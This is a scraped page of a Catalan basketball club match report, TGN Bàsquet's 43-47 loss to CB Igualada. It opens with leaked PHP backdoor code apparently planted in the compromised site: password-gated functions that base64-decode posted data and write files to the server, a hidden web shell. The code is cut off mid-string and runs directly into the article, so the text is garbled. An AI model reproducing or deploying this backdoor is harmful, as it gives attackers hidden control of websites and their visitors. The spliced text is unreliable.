function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet es queda a les portes de guanyar a un dels líders de la categoria, el CB Igualada (43-47) - Tgn Bàsquet Club -

El TGN Bàsquet es queda a les portes de guanyar a un dels líders de la categoria, el CB Igualada (43-47)

Updated: febrer 10, 2022

El Sènior Copa del TGN Bàsquet va tardar en posar-se al partit, però gràcies a un tercer quart d’encert i bones decisions va estar molt a prop d’aconseguir la victòria contra el CB Igualada, actual líder de la classificació. Les liles van anar per darrere en el marcador durant tota la primera part, ja que en atac no van saber jugar amb ritme i els va costar trobar bones opcions per sumar punts. Tot i això, les igualadines no van arribar en cap moment a agafar massa distància en el marcador, gràcies a la defensa local que va ser molt més dura que la del partit d’anada. L’inici de la segona meitat va ser vital per a les tarragonines. Van fer un parcial de 14-5 que costava de creure i que les deixava amb una avantatge de 6 punts al final del tercer període. Tot plegat va entusiasmar a l’afició i la banqueta lila. Malgrat això les rivals van reaccionar i no es van deixar guanyar. La idea de la victòria, que tant havia treballat l’equip entrenat per Neila al tercer quart, es desdibuixava a l’últim període. La ratxa anotadora de les visitants i la seva defensa va deixar quasi cinc minuts sense anotar al TGN, que va acabar encaixant un parcial 7-17.

L’entrenador Victor Neila lamenta l’últim quart i dona valor a la feina feta per les jugadores en el tercer quart. Recordem que les jugadores del TGN van perdre de 18 punts a la primera volta contra aquest equip i que per tant cal valorar de manera positiva el matx.